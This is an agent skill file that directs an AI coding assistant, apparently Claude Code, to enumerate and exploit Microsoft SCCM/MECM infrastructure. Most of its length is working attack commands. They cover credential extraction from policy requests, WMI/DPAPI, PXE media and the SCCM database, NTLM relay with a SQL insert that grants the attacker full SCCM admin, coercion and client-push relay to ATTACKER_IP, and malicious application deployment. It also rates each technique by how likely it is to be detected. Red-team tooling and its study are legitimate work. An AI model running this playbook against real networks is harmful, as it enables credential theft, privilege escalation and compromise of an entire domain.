| name | sccm-exploitation |
| description | Enumerates and exploits Microsoft SCCM/MECM (System Center Configuration Manager / Microsoft Endpoint Configuration Manager) infrastructure for credential harvesting, lateral movement, and domain escalation. Covers SCCM enumeration (sccmhunter, SharpSCCM), Network Access Account (NAA) credential extraction (policy request, WMI DPAPI, WMI repository), management point NTLM relay to MSSQL (TAKEOVER1), client push relay (ELEVATE2), PXE boot media credential harvesting (CRED1), SCCM database credential extraction, application deployment for lateral movement, and SCCM share looting.
|
| keywords | ["SCCM","MECM","ConfigMgr","Configuration Manager","management point","sccmhunter","SharpSCCM","NAA","Network Access Account","PXE boot","client push","task sequence","OSD secrets","SCCMContentLib","CMLoot","MalSCCM","SCCM relay"] |
| tools | ["sccmhunter","SharpSCCM","MalSCCM","ntlmrelayx","PetitPotam","pxethiefy","CMLoot","Mimikatz","SQLRecon"] |
| opsec | medium |
SCCM/MECM Exploitation
You are helping a penetration tester enumerate and exploit Microsoft
SCCM/MECM infrastructure for credential harvesting, lateral movement,
and domain escalation. All testing is under explicit written authorization.
Engagement Logging
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print
[sccm-exploitation] Activated → <target> to the screen on activation.
- Evidence → save significant output to
engagement/evidence/ with
descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).
State Management
Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
Access required: Domain user (for enumeration and NAA extraction via
policy request). Local admin on SCCM client (for WMI/DPAPI extraction).
Domain admin or relay position (for MP relay and database attacks).
Kerberos authentication setup (for enumeration):
getTGT.py 'DOMAIN.LOCAL/username:password' -dc-ip DC_IP
export KRB5CCNAME=$(pwd)/username.ccache
Tools: sccmhunter, SharpSCCM, MalSCCM, ntlmrelayx.py, PetitPotam,
pxethiefy/PXEThief/SharpPXE, CMLoot, Mimikatz, SQLRecon.
Privileged Commands
Claude Code cannot execute sudo commands. The following require root and
must be handed off to the user:
- pxethiefy.py — PXE boot credential harvesting (needs raw sockets for DHCP/TFTP)
- ntlmrelayx.py — NTLM relay to SCCM management point MSSQL (needs raw sockets)
Handoff protocol: Present the full command including sudo, ask the user
to run it, then read the output or wait for callback confirmation.
Non-privileged commands Claude can execute directly:
- Enumeration:
sccmhunter, SharpSCCM, CMLoot
- Policy extraction:
sccmhunter http, sccmhunter show
- Post-exploitation:
SQLRecon, MalSCCM, Mimikatz
- Coercion triggers:
PetitPotam.py
Step 1: Enumerate SCCM Infrastructure
Discovery via sccmhunter
sccmhunter.py find -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP
sccmhunter.py show -siteservers
sccmhunter.py http -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP -auto
SharpSCCM (from compromised Windows host)
# Enumerate devices managed by site server
.\SharpSCCM.exe get devices --server SCCM01 --site-code P01
Unauthenticated MP Endpoints
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPLIST | xmllint --format -
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?SITESIGNCERT | xmllint --format -
These HTTP endpoints are unauthenticated and reveal site structure.
Attack Path Decision Tree
SCCM Infrastructure Found
├── Have local admin on SCCM client? → Step 3 (NAA from WMI/DPAPI — quietest)
├── Can create machine account? → Step 2 (NAA via policy request)
├── Can reach MP + MSSQL? → Step 4 (MP relay to MSSQL)
├── Auto client push enabled? → Step 5 (Client push relay)
├── PXE-enabled DP? → Step 6 (PXE boot credential harvesting)
├── Have SCCM admin or DB access? → Step 7 (Database credential extraction)
└── Have SCCM admin? → Step 8 (Application deployment for lateral movement)
Step 2: NAA Extraction via Policy Request (CRED-2)
Extract Network Access Account credentials by requesting machine policy
from the management point. Requires a machine account (real or created).
Create Machine Account + Request Policy
addcomputer.py -computer-name 'fakesccm$' -computer-pass 'Password123!' \
'DOMAIN.LOCAL/user:pass' -dc-ip DC_IP
echo "SCCM_IP SCCM01 SCCM01.DOMAIN.LOCAL" >> /etc/hosts
python3 sccmwtf.py fake fakepc.domain.local SCCM01 'DOMAIN\fakesccm$' 'Password123!'
cat /tmp/naapolicy.xml | grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 \
| grep 'CDATA' | cut -d '[' -f 3 | cut -d ']' -f 1 \
| xargs -I {} python3 policysecretunobfuscate.py {}
SharpSCCM Alternative
# From a compromised host (creates new device registration)
.\SharpSCCM.exe get naa -r newdevice -u fakesccm$ -p 'Password123!'
.\SharpSCCM.exe get secrets -u fakesccm$ -p 'Password123!'
Recovered secrets: NetworkAccessUsername, NetworkAccessPassword —
typically a domain account used for SCCM client network access during OSD.
Step 3: NAA Extraction from Running Client (CRED-3 / CRED-4)
Extract NAA credentials from a compromised SCCM client's local WMI store.
Requires local administrator on the SCCM client.
WMI Query + DPAPI Decryption (CRED-3)
# Query NAA from WMI (DPAPI-encrypted blobs)
Get-WmiObject -Namespace "root\ccm\policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"
# Output: NetworkAccessPassword = <![CDATA[E600000001...]]>
# Decrypt with SharpSCCM (automated)
.\SharpSCCM.exe local secrets -m wmi
# Decrypt with SharpDPAPI (manual)
$str = "060...F2DAF" # Hex from WMI output
$bytes = for($i=0; $i -lt $str.Length; $i++) {
[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++
}
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt
WMI Repository Search (CRED-4 — Legacy)
# Search WMI repository file for encrypted secrets
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
# SharpSCCM automated disk search
.\SharpSCCM.exe local secrets -m disk
sccmhunter HTTP Method (Remote)
sccmhunter.py http -u 'admin' -p 'Password' -d DOMAIN.LOCAL -dc-ip DC_IP -auto
Step 4: Management Point Relay to MSSQL (TAKEOVER-1)
Relay the management point's NTLM authentication to the SCCM database
to gain sysadmin access and extract OSD policy secrets.
Prerequisites: Network access to MP and MSSQL, ability to coerce
MP authentication (PetitPotam/PrinterBug/DFSCoerce).
Start Relay Listener
ntlmrelayx.py -ts -t mssql://MSSQL_IP -socks -smb2support
ntlmrelayx.py -smb2support -ts -t mssql://MSSQL_IP -q "USE CM_P01; \
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) \
VALUES (0x<YOUR_SID_HEX>,'DOMAIN\\your_user',0,0,'','','','','P01'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00ALL','29'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00001','1'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00004','1');"
Coerce MP Authentication
python3 PetitPotam.py RELAY_LISTENER_IP MP_IP -u user -p pass -d DOMAIN -dc-ip DC_IP
Extract OSD Secrets via SOCKS Proxy
proxychains mssqlclient.py -windows-auth 'DOMAIN/MP01$'@MSSQL_IP
USE CM_P01;
SELECT SMS_Unique_Identifier0 FROM dbo.UnknownSystem_DISC WHERE DiscArchKey = 2;
EXEC MP_GetMachinePolicyAssignments N'<GUID>', N'';
EXEC MP_GetPolicyBody N'{POLICY_ID}', N'2.00';
Decrypt Policy Blob
echo 'fffe3c003f0078...' | xxd -r -p > policy.xml
python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)
Recovers: OSDJoinAccount/Password, NetworkAccessUsername/Password, and
other task sequence variable credentials.
sccmhunter Automated MSSQL Path
sccmhunter.py mssql -u user -p pass -d DOMAIN.LOCAL -dc-ip DC_IP \
-tu your_user -sc P01 -stacked
Step 5: Client Push Account Relay (ELEVATE-2)
If automatic site-wide client push is enabled, trigger the SCCM site
server to authenticate as the client push account and relay it.
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support
.\SharpSCCM.exe invoke client-push -t ATTACKER_IP
SCCM site server authenticates as the client push installation account
to your IP — relay to MSSQL for sysadmin or to LDAP for RBCD/machine
account creation.
Conditions: Automatic site-wide client push enabled + automatic
device approval + NTLM fallback allowed.
Step 6: PXE Boot Credential Harvesting (CRED-1)
Extract credentials from PXE-enabled Distribution Points.
pxethiefy (Linux)
sudo python3 pxethiefy.py explore -i eth0
SharpPXE (Windows)
# Send PXE boot request, download variables.dat via TFTP
.\SharpPXE.exe
# If password-protected: outputs $sccm$aes128$... for Hashcat
Manual TFTP Download
tftp MP01.domain.local
tftp> get SMSBoot\\x64\\pxe\\variables.dat
cp hash.txt engagement/evidence/sccm-pxe-hash.txt
Do NOT crack hashes in this skill. Save the PXE hash to
engagement/evidence/ and return to the orchestrator with the hash file path,
hash type (SCCM PXE / hashcat mode 31100), and a routing recommendation to
credential-recovery.
Recovered: Management Point URL, site code, media GUIDs, potentially
task sequence credentials.
Step 7: Database Credential Extraction (CRED-5)
Extract all encrypted credentials from the SCCM database's SC_UserAccount
table. Requires sysadmin access to the database (via relay or direct).
Mimikatz (Direct SCCM Decryption)
# Queries SC_UserAccount + decrypts all credentials
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=CM_P01;SERVER=MSSQL01;"
SQLRecon
# On site server where DB is local
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:sDecryptCredentials
# Manual extraction
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:query /command:"SELECT * FROM SC_UserAccount"
Manual Decryption
sccmdecryptpoc.exe 0C010000080...5D6F0
Step 8: Application Deployment for Lateral Movement
Deploy malicious applications to device collections for code execution
on target machines. Requires SCCM admin access.
MalSCCM (Full Chain)
# 1. Enumerate targets
MalSCCM.exe locate
MalSCCM.exe inspect /computers
# 2. Create device collection
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
# 3. Add target hosts
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET01
# 4. Create application (UNC path to payload on SCCMContentLib$)
MalSCCM.exe app /create /name:update /uncpath:"\\\\SCCM01\\SCCMContentLib$\\payload.exe"
# 5. Deploy to group
MalSCCM.exe app /deploy /name:update /groupname:TargetGroup /assignmentname:deploy01
# 6. Force immediate checkin
MalSCCM.exe checkin /groupname:TargetGroup
# 7. Cleanup
MalSCCM.exe app /cleanup /name:update
MalSCCM.exe group /delete /groupname:TargetGroup
SharpSCCM (Simpler Execution)
# Direct command execution on device
.\SharpSCCM.exe exec -d TARGET01 -p "C:\Windows\System32\cmd.exe /c whoami > C:\temp\out.txt" -s
SCCM Share Looting (CMLoot)
# Inventory all files on SCCM shares
Invoke-CMLootInventory -SCCMHost SCCM01.domain.local -Outfile sccmfiles.txt
# Download interesting files
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
Invoke-CMLootDownload -SingleFile '\\SCCM01\SCCMContentLib$\DataLib\SC100001.1\x86\config.xml'
SCCMContentLib$ is world-readable and may contain application binaries,
task sequence XML with embedded credentials, and configuration files.
Step 9: Escalate or Pivot
STOP and return to the orchestrator with:
- What was achieved (RCE, creds, file read, etc.)
- New credentials, access, or pivot paths discovered
- Context for next steps (platform, access method, working payloads)
Troubleshooting
sccmhunter find Returns Nothing
- Verify LDAP connectivity:
nxc ldap DC_IP -u user -p pass
- SCCM objects may be in a different naming context — try manual LDAP
search for
mSSMSSite objectClass
- Site server may not be registered in AD (standalone) — scan network
for port 80/443 on servers and check
/SMS_MP/ endpoint
Policy Request Fails (NAA Extraction)
- Management point may require PKI client certificate — check MP
configuration for "HTTPS only" mode
- Machine account may not be registered — use SharpSCCM to register
a new device identity
- DNS must resolve the MP hostname — add
/etc/hosts entry
Relay to MSSQL Fails
- SMB signing may be required on MSSQL host — check with
nxc smb MSSQL_IP for signing status
- MSSQL may not accept relay — Extended Protection for Authentication
(EPA) blocks relay on modern SQL Server
- Verify MP is sysadmin on DB — try SOCKS proxy after relay to confirm
PXE Boot Extraction Fails
- PXE must be enabled on Distribution Point — check registry
HKLM\Software\Microsoft\SMS\DP\PxeInstalled
- Need network reachability on UDP 4011 (DHCP proxy) and UDP 69 (TFTP)
- If password-protected: extract hash and route to credential-recovery (mode 31100)
Application Deployment Not Executing
- Default GPUpdate interval is 90 minutes — use
MalSCCM.exe checkin
or gpupdate /force on target
- Verify device is in the collection:
MalSCCM.exe inspect /groups
- Check SCCM client logs on target:
C:\Windows\CCM\Logs\
KRB_AP_ERR_SKEW (Clock Skew)
Kerberos requires clocks within 5 minutes of the DC. This is a Clock Skew
Interrupt — stop immediately and return to the orchestrator. Do not retry or
fall back to NTLM. The fix requires root:
sudo ntpdate DC_IP
sudo rdate -n DC_IP
OPSEC Comparison
| Technique | OPSEC | Detection | Prerequisites |
|---|
| SCCM enumeration (sccmhunter find) | Low-Medium | LDAP queries | Domain user |
| MP HTTP endpoint queries | Low | IIS logs | Network access |
| NAA from WMI (CRED-3) | Low | Local execution | Local admin on client |
| NAA from WMI repository (CRED-4) | Low | File access | Local admin on client |
| NAA via policy request (CRED-2) | Medium-High | Machine account creation + MP logs | Domain user |
| SCCM share looting (CMLoot) | Low | SMB access logs | Domain user |
| PXE boot harvesting (CRED-1) | Medium | DHCP/TFTP logs on DP | Network access |
| MP relay to MSSQL (TAKEOVER-1) | High | Coercion + relay + SQL audit | Network position |
| Client push relay (ELEVATE-2) | High | Server logs + auth events | Client push enabled |
| Database extraction (CRED-5) | High | SQL audit logs | DB sysadmin |
| Application deployment | High | Extensive SCCM + client logs | SCCM admin |
